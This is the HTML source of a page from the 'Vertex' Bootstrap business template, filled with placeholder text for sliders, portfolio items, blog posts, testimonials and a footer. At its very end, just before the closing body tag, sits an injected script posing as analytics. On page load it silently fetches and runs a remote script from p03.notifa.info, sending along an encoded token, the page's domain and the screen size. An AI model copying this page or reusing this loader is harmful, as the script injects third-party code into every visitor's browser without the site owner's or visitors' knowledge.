                            <img src="http://bootstraptemplates.net/vertex/img/mix/plant.png" alt="" />
                        </div>

                        <div class="tp-caption rs-parallaxlevel-2"
                             data-x="right" data-hoffset="['-140','-140','-200','-240']"
                             data-y="center" data-voffset="0"
                             data-start="1600"
                             data-type="image"
                             data-basealign="slide"
                             data-transform_in="x:[10%];opacity:0;s:500;"
                             data-transform_out="x:[10%];opacity:0;s:500;">
                            <img src="http://bootstraptemplates.net/vertex/img/mix/notebook-right.png" alt="" />
                        </div>

                        <div class="tp-caption text-color-dark font-primary font-weight-thin rs-parallaxlevel-1"
                             data-x="center" data-hoffset="['-222','-222','-222','-118']"
                             data-y="center" data-voffset="['-70','-70','-70','-70']"
                             data-start="1400"
                             data-fontsize="['28','28','28','28']"
                             data-basealign="slide"
                             data-transform_in="y:[100%];opacity:0;s:500;"
                             data-transform_out="y:[100%];opacity:0;s:500;">Start right now</div>

                        <div class="tp-caption text-color-dark font-primary font-weight-bold letter-spacing-10 rs-parallaxlevel-2"
                             data-x="center"
                             data-y="center" data-voffset="-20"
                             data-start="1000"
                             data-fontsize="['52','52','52','32']"
                             data-transform_in="y:[50%];opacity:0;s:500;"
                             data-transform_out="y:[50%];opacity:0;s:500;">CREATIVE DIGITAL</div>

                        <a class="tp-caption btn btn-rounded btn-primary font-weight-semibold rs-parallaxlevel-1"
                           href="index-header-navbar_2.html#start"
                           data-hash
                           data-hash-offset="90"
                           data-x="center" data-hoffset="['205','205','205','80']"
                           data-y="center" data-voffset="['55','55','55','45']"
                           data-start="1600"
                           data-whitespace="nowrap"
                           data-fontsize="['13','13','13','20']"
                           data-paddingtop="['13','13','13','13']"
                           data-paddingbottom="['13','13','13','13']"
                           data-paddingleft="['65','65','65','65']"
                           data-paddingright="['65','65','65','65']"
                           data-transform_in="y:[-50%];opacity:0;s:500;"
                           data-transform_out="y:[50%];opacity:0;s:500;">GET STARTED</a>

                        <a class="tp-caption btn btn-link font-weight-semibold text-color-dark text-decoration-none d-flex align-items-center rs-parallaxlevel-3"
                           href="http://bootstraptemplates.net/vertex/portfolio-grid-4-columns.html"
                           data-x="center" data-hoffset="['242','242','242','115']"
                           data-y="center" data-voffset="['115','115','115','110']"
                           data-start="1900"
                           data-whitespace="nowrap"
                           data-fontsize="['13','13','13','20']"
                           data-transform_in="y:[-50%];opacity:0;s:500;"
                           data-transform_out="y:[50%];opacity:0;s:500;">OUR PORTFOLIO<i class="fa fa-angle-right text-color-primary text-4 ml-2"></i></a>

                    </li>
                    <li data-transition="fade">
                        <img src="http://bootstraptemplates.net/vertex/img/slider/slider3.jpg"
                             alt=""
                             data-bgposition="center center"
                             data-bgfit="cover"
                             data-bgrepeat="no-repeat"
                             class="rev-slidebg">

                        <div class="tp-caption bg-dark-3"
                             data-x="['625','435','185','100']"
                             data-y="400"
                             data-start="1000"
                             data-width="1500"
                             data-height="['155','155','155','155']"
                             data-transform_in="x:[100%];opacity:0;s:500;"
                             data-transform_idle="skX:-19deg;opacity:0.9;"
                             data-transform_out="y:[50%];opacity:0;s:500;"></div>

                        <h1 class="tp-caption text-color-light font-primary font-weight-thin"
                            data-x="right" data-hoffset="['0','20','20','20']"
                            data-y="bottom" data-voffset="['137','137','137','137']"
                            data-start="1300"
                            data-fontsize="['32','32','32','30']"
                            data-lineheight="['32','32','32','30']"
                            data-transform_in="y:[100%];opacity:0;s:500;"
                            data-transform_out="y:[-100%];opacity:0;s:500;">
                            World-Class Technology
                        </h1>

                        <div class="tp-caption bg-light"
                             data-x="['660','460','220','110']"
                             data-y="bottom" data-voffset="['78','78','78','83']"
                             data-start="1600"
                             data-width="7"
                             data-height="['45','45','45','36']"
                             data-transform_in="x:[-100%];opacity:0;s:500;"
                             data-transform_idle="skX:-19deg"
                             data-transform_out="x:[-100%];opacity:0;s:500;"></div>

                        <div class="tp-caption text-color-light font-primary font-weight-bold"
                             data-x="right" data-hoffset="['0','20','20','20']"
                             data-y="bottom" data-voffset="['88','88','88','88']"
                             data-start="1600"
                             data-fontsize="['42','42','42','36']"
                             data-transform_in="opacity:0;s:300;"
                             data-transform_out="opacity:0;s:300;">CREATIVE COMPANY</div>

                    </li>
                </ul>
            </div>
        </div>

        <div class="v-page-wrap no-bottom-spacing">

            <div class="container">
                <div class="row">
                    <div class="col-sm-4">
                        <div class="feature-box left-icon-v2" data-aos="zoom-out-up" data-aos-delay="0">
                            <i class="fa fa-cloud-download v-icon icn-holder medium"></i>
                            <div class="feature-box-text">
                                <h3>Updates & New Features</h3>
                                <div class="feature-box-text-inner">
                                    <p>
                                        Class aptent taciti sociosqu ad litora torquent per conubia nostra,
                                        per inceptos himenaeos. Nulla nunc dui, alenga simtosa litora tristique in semper vellet semper.
                                    </p>
                                    <a href="index-header-navbar_2.html#" class="read-more">Read More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-sm-4">

                        <div class="feature-box left-icon-v2" data-aos="zoom-out-up" data-aos-delay="200">
                            <i class="fa fa-cogs v-icon icn-holder medium"></i>
                            <div class="feature-box-text">
                                <h3>Boxed & Wide Layout</h3>
                                <div class="feature-box-text-inner">
                                    <p>
                                        Class aptent taciti sociosqu ad litora torquent per conubia nostra,
                                        per inceptos himenaeos. Nulla nunc dui, alenga simtosa litora tristique in semper vellet semper.
                                    </p>
                                    <a href="index-header-navbar_2.html#" class="read-more">Read More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-sm-4">
                        <div class="feature-box left-icon-v2" data-aos="zoom-out-up" data-aos-delay="400">
                            <i class="icon-trophy v-icon icn-holder medium"></i>
                            <div class="feature-box-text">
                                <h3>Advanced Typography</h3>
                                <div class="feature-box-text-inner">
                                    <p>
                                        Class aptent taciti sociosqu ad litora torquent per conubia nostra,
                                        per inceptos himenaeos. Nulla nunc dui, tristique in semper vel ad litora torquent per.
                                    </p>
                                    <a href="index-header-navbar_2.html#" class="read-more">Read More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="v-spacer col-sm-12 v-height-standard"></div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="col-sm-12">

                        <div class="v-heading-v2">
                            <h3>Featured Works</h3>
                        </div>

                        <div class="carousel-wrap">

                            <div class="owl-carousel v-portfolio-items" data-plugin-options='{"items": 4, "singleItem": false, "autoPlay": true}'>

                                <div class="v-portfolio-item">
                                    <figure class="animated-overlay">
                                        <img src="img/mix/portfolio-4_2.jpg" width="420" height="315" />
                                        <a href="portfolio-single_2.html" class="link-to-post"></a>
                                        <figcaption>
                                            <div class="thumb-info">
                                                <h4>Suspendisse Euismod</h4>
                                                <i class="fa fa-angle-right"></i>
                                            </div>
                                        </figcaption>
                                    </figure>
                                </div>

                                <div class="v-portfolio-item">
                                    <figure class="animated-overlay">
                                        <img src="img/mix/portfolio-3_2.jpg" />
                                        <a href="portfolio-single_2.html" class="link-to-post"></a>
                                        <figcaption>
                                            <div class="thumb-info">
                                                <h4>Proin Faucibus</h4>
                                                <i class="fa fa-angle-right"></i>
                                            </div>
                                        </figcaption>
                                    </figure>
                                </div>

                                <div class="v-portfolio-item">
                                    <figure class="animated-overlay">
                                        <img src="http://bootstraptemplates.net/vertex/img/mix/portfolio-8.jpg" />
                                        <a href="portfolio-single_2.html" class="link-to-post"></a>
                                        <figcaption>
                                            <div class="thumb-info">
                                                <h4>Faucibus Pretium</h4>
                                                <i class="fa fa-angle-right"></i>
                                            </div>
                                        </figcaption>
                                    </figure>
                                </div>

                                <div class="v-portfolio-item">
                                    <figure class="animated-overlay">
                                        <img src="img/mix/portfolio-11_2.jpg" />
                                        <a href="portfolio-single_2.html" class="link-to-post"></a>
                                        <figcaption>
                                            <div class="thumb-info">
                                                <h4>Cras Aliquam</h4>
                                                <i class="fa fa-angle-right"></i>
                                            </div>
                                        </figcaption>
                                    </figure>
                                </div>

                                <div class="v-portfolio-item">
                                    <figure class="animated-overlay">
                                        <img src="http://bootstraptemplates.net/vertex/img/mix/portfolio-7.jpg" />
                                        <a href="portfolio-single_2.html" class="link-to-post"></a>
                                        <figcaption>
                                            <div class="thumb-info">
                                                <h4>Proin Faucibus</h4>
                                                <i class="fa fa-angle-right"></i>
                                            </div>
                                        </figcaption>
                                    </figure>
                                </div>

                                <div class="v-portfolio-item">
                                    <figure class="animated-overlay">
                                        <img src="img/mix/portfolio-6_2.jpg" />
                                        <a href="portfolio-single_2.html" class="link-to-post"></a>
                                        <figcaption>
                                            <div class="thumb-info">
                                                <h4>Mauris Quis Sapien</h4>
                                                <i class="fa fa-angle-right"></i>
                                            </div>
                                        </figcaption>
                                    </figure>
                                </div>
                            </div>

                            <div class="customNavigation">
                                <a class="prev"><i class="fa fa-angle-left"></i></a>
                                <a class="next"><i class="fa fa-angle-right"></i></a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="v-spacer col-sm-12 v-height-standard"></div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="col-sm-4">

                        <div class="v-heading-v2">
                            <h3>Why Choose Us</h3>
                        </div>

                        <div class="v-wrapper">
                            <ul class="v-list">
                                <li><i class="fa fa-star-o"></i><span>Your content will always look good on any screen.</span></li>
                                <li><i class="fa fa-star-o"></i><span>Sliders give you the opportunity to showcase.</span></li>
                                <li><i class="fa fa-star-o"></i><span>Unlimited color options with a backed colors.</span></li>
                                <li><i class="fa fa-star-o"></i><span>Multiple layout for home pages, portfolio & blog.</span></li>
                                <li><i class="fa fa-star-o"></i><span>Class aptent taciti sociosqu ad litora.</span></li>
                                <li><i class="fa fa-star-o"></i><span>Unlimited color options with backed color picker.</span></li>
                                <li><i class="fa fa-star-o"></i><span>Your content will always look good on any screen.</span></li>
                            </ul>
                        </div>
                    </div>

                    <div class="col-sm-4">

                        <div class="v-heading-v2">
                            <h3>Latest From Blog</h3>
                        </div>

                        <div class="carousel-wrap">

                            <div class="owl-carousel" data-plugin-options='{"items": 1, "autoPlay": 12000, "autoHeight": true}'>
                                <div class="item">
                                    <div class="v-blog-recent-post">
                                        <div class="blog-list-item-date">03<span>Mar</span></div>
                                        <div class="blog-list-content">
                                            <h6 class="special"><a href="index-header-navbar_2.html#" title="Youtube Post">Standard Image Post</a></h6>
                                            <small>5 Comments</small><div class="blog-list-item-excerpt">
                                                <p>
                                                    Lorem ipsum dolor sit amet, consectetur adipiscing elit.
                                                    Aliquam bibendum, libero eu rutrum feugiat, urna orci porta,
                                                    Lorem ipsum dolor sit consectetur adipiscing elit...
                                                </p>
                                                <a href="index-header-navbar_2.html#" class="read-more">Read More</a>
                                            </div>
                                        </div>
                                    </div>
                                </div>

                                <div class="item">
                                    <div class="v-blog-recent-post">
                                        <div class="blog-list-item-date">03<span>Mar</span></div>
                                        <div class="blog-list-content">
                                            <h6 class="special"><a href="index-header-navbar_2.html#" title="Youtube Post">Full Width Media Post</a></h6>
                                            <small>2 Comments</small><div class="blog-list-item-excerpt">
                                                <p>
                                                    Lorem ipsum dolor sit amet, consectetur adipiscing elit.
                                                    urna orci porta, Lorem ipsum dolor sit amet, consectetur adipiscing
                                                    Lorem ipsum dolor sit amet, consectetur elit...
                                                </p>
                                                <a href="index-header-navbar_2.html#" class="read-more">Read More</a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>

                    <div class="col-sm-4">
                        <div class="v-heading-v2">
                            <h3>What Clients Say</h3>
                        </div>

                        <div class="carousel-wrap">
                            <div class="v-testimonial-wrap-v2">
                                <div class="owl-carousel" data-plugin-options='{"items": 1, "autoPlay": 9000, "pagination": true, "autoHeight": true}'>

                                    <div class="v-testimonial-item">
                                        <div class="testimonial testimonial-thumb-side">
                                            <div class="testimonial-author">
                                                <figure class="featured-thumbnail">
                                                    <img src="img/team/t1_2.png">
                                                </figure>
                                            </div>

                                            <div class="wrapper">
                                                <div class="excerpt">
                                                    Proin fermentum, augue id porttitor condimentum, tellus nisi dapibus est, ultricies
                                                    malesuada metus massa a orci. Donec consequat ornare erat, vitae vehicula orci feugiat ac
                                                    nisi dapibus est augue id porttitor condimentum tellus.
                                                </div>
                                                <div class="user">- Tim Barkley, <span>CEO</span></div>
                                            </div>
                                        </div>
                                    </div>

                                    <div class="v-testimonial-item">
                                        <div class="testimonial testimonial-thumb-side">
                                            <div class="testimonial-author">
                                                <figure class="featured-thumbnail">
                                                    <img src="img/team/t1_2.png">
                                                </figure>
                                            </div>

                                            <div class="wrapper">
                                                <div class="excerpt">
                                                    Proin fermentum, augue id porttitor condimentum, tellus nisi dapibus est, ultricies
                                                    malesuada metus massa a orci. Donec consequat ornare erat, vitae vehicula orci feugiat ac
                                                    fermentum, augue id porttitor condimentum, tellus nisi dapibus est, ultricies.
                                                </div>
                                                <div class="user">- Tim Barkley, <span>CEO</span></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="v-spacer col-sm-12 v-height-small"></div>
                </div>
            </div>

            <div class="v-call-to-action v-bg-stylish v-bg-stylish-v4">
                <div class="v-call-to-action-wrap clearfix">
                    <div class="container">
                        <div class="row">
                            <div class="col-sm-9">
                                <div class="v-call-to-action-inner">
                                    <h1>Vertex is the Perfect Solition for Your Business.</h1>
                                    <h3>Don't Forget to Rate the Template. Thanks so much!</h3>
                                </div>
                            </div>
                            <div class="col-sm-3 pull-right">
                                <a class="btn v-btn v-btn-default no-three-d" target="_blank" href="index-header-navbar_2.html#"><i class="fa fa-cloud-download"></i><span>Download Now</span></a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <!--Footer-Wrap-->
        <div class="footer-wrap">
            <footer>
                <div class="container">
                    <div class="row">
                        <div class="col-sm-3">
                            <section class="widget">
                                <img alt="Vertex" src="img/logo-white_2.png" style="height: 40px; margin-bottom: 20px;">
                                <p class="pull-bottom-small">
                                    Donec quam felis, ultricies nec, pellen tesqueeu, pretium quis, sem. Nulla consequat massa quis enim. Donec pede justo, fringilla vel aliquet nec, vulputate eget aliquet nec, arcu.
                                </p>
                                <p>
                                    <a href="page-about-us-2_2.html">Read More →</a>
                                </p>
                            </section>
                        </div>
                        <div class="col-sm-3">
                            <section class="widget v-twitter-widget">
                                <div class="widget-heading">
                                    <h4>Latest Tweets</h4>
                                    <div class="horizontal-break"></div>
                                </div>
                                <ul class="v-twitter-widget">
                                    <li>
                                        <div class="tweet-text">
                                            <a href="index-header-navbar_2.html#" target="_blank">@Vertex</a>
                                            Lorem ipsum dolor sit amet, consec adipiscing elit onvallis dignissim.
                                        </div>
                                        <div class="twitter_intents">
                                            <a class="timestamp" href="index-header-navbar_2.html#" target="_blank">3 hours ago</a>
                                        </div>
                                    </li>
                                    <li>
                                        <div class="tweet-text">
                                            <a href="index-header-navbar_2.html#" target="_blank">@Vertex</a>
                                            Sed blandit conval dignissim. pharetra velit eu velit et erat pharetra.
                                        </div>
                                        <div class="twitter_intents">
                                            <a class="timestamp" href="index-header-navbar_2.html#" target="_blank">5 days ago</a>
                                        </div>
                                    </li>
                                </ul>
                            </section>
                        </div>
                        <div class="col-sm-3">
                            <section class="widget v-recent-entry-widget">
                                <div class="widget-heading">
                                    <h4>Recent Posts</h4>
                                    <div class="horizontal-break"></div>
                                </div>
                                <ul>
                                    <li>
                                        <a href="blog-standard-post_2.html">Amazing Standard Post</a>
                                    </li>
                                    <li>
                                        <a href="blog-full-width-post_2.html">Full Width Media Post</a>
                                    </li>
                                    <li>
                                        <a href="http://bootstraptemplates.net/vertex/blog-video-post.html">Perfect Video Post</a>
                                    </li>
                                    <li>
                                        <a href="http://bootstraptemplates.net/vertex/blog-slideshow-post.html">Amazing Slideshow post</a>
                                    </li>
                                </ul>
                            </section>
                        </div>
                        <div class="col-sm-3">
                            <section class="widget">
                                <div class="widget-heading">
                                    <h4>Recent Works</h4>
                                    <div class="horizontal-break"></div>
                                </div>
                                <ul class="portfolio-grid">
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-1_2.jpg" />
                                            <span class="tooltip">Phasellus enim libero<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-2_2.jpg" />
                                            <span class="tooltip">Phasellus enim libero<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-3_2.jpg" />
                                            <span class="tooltip">Phasellus enim<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-4_2.png" />
                                            <span class="tooltip">Lorem Imput<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-5_2.jpg" />
                                            <span class="tooltip">Phasellus Enim libero<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-6_2.jpg" />
                                            <span class="tooltip">Phasellus Enim<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                </ul>
                            </section>
                        </div>
                    </div>
                </div>
            </footer>

            <div class="copyright">
                <div class="container">
                    <p>© Copyright 2018 by Vertex. All Rights Reserved.</p>

                    <div class="clearfix pull-right">
                        <a href="index-header-navbar_2.html#" class="social-icon si-borderless si-facebook mb-0" title="Facebook">
                            <i class="si-icon-facebook"></i>
                            <i class="si-icon-facebook"></i>
                        </a>
                        <a href="index-header-navbar_2.html#" class="social-icon si-borderless si-twitter mb-0" title="Twitter">
                            <i class="si-icon-twitter"></i>
                            <i class="si-icon-twitter"></i>
                        </a>
                        <a href="index-header-navbar_2.html#" class="social-icon si-borderless si-instagram mb-0" title="Instagram">
                            <i class="si-icon-instagram"></i>
                            <i class="si-icon-instagram"></i>
                        </a>
                        <a href="index-header-navbar_2.html#" class="social-icon si-borderless si-vk mb-0" title="Vk">
                            <i class="si-icon-vk"></i>
                            <i class="si-icon-vk"></i>
                        </a>
                    </div>
                </div>
            </div>
        </div>
        <!--End Footer-Wrap-->
    </div>

    <!-- Libs -->
    <script src="js/jquery.min_2.js"></script>
    <script src="js/popper_2.js"></script>
    <script src="js/bootstrap.min_2.js"></script>
    <script src="js/jquery.flexslider-min_2.js"></script>
    <script src="js/jquery.easing_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/jquery.fitvids_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/jquery.carouFredSel.min_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/jquery.validate_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/theme-plugins_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/jquery.isotope.min_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/imagesloaded_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/view.min_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/plugins/aos/aos_2.js"></script>

    <script src="http://bootstraptemplates.net/vertex/plugins/rs-plugin/js/jquery.themepunch.tools.min_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/plugins/rs-plugin/js/jquery.themepunch.revolution.min_2.js"></script>

    <script src="http://bootstraptemplates.net/vertex/js/common.min.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/theme-core_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/theme_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/theme.init_2.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH26U7Hc7xnlRbkRuc8sibK8UY8OgS41cPSR0HWepAH%2b1%2bJjwbzAHAcf4SML3T%2bzPTANe01TOZI8DPLmWggXMOmSbwxCxhP%2bjZNXDMytNdPuKg%2bOw06BTdPa2pg0ogA1wtIuXVA1oe1kfjnFhfPOa%2f4AAXxLpjY1KJ6xEgiLseov6zqsEARCqTur6VO7XbtSxrzsx5q10NwdSTvobOwZp%2bmCaUdBKhj31G%2bH9v1UBDwwdnqS3bHmB%2bauonoqZ4aVEV2DzJhlrBE7SE5sQXDVoqiMEqKVgPB5e%2f880AxmOs%2fsXHHdwNFCSbUruem5f8flyrD4c9UX7yDDq2cp9kPpLjNkwIa0ukBnCYS5REHtC9gpuGpoQlHWTKK6GGEEtdzcHw246JIeeucBrnZJ5bO7Z2OjpoPqwuKue2wVygZXGHRb0TnHcqywKHQh7Yrcfot6UtNecvsP6BXeNETvfcra0pLrd9gWAc919V6HikI%2fh4WMs1VYxzzYxSVF2H2xRwTg%2f%2fcvwKGYO6JVG3LDDcy6OtT9A%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>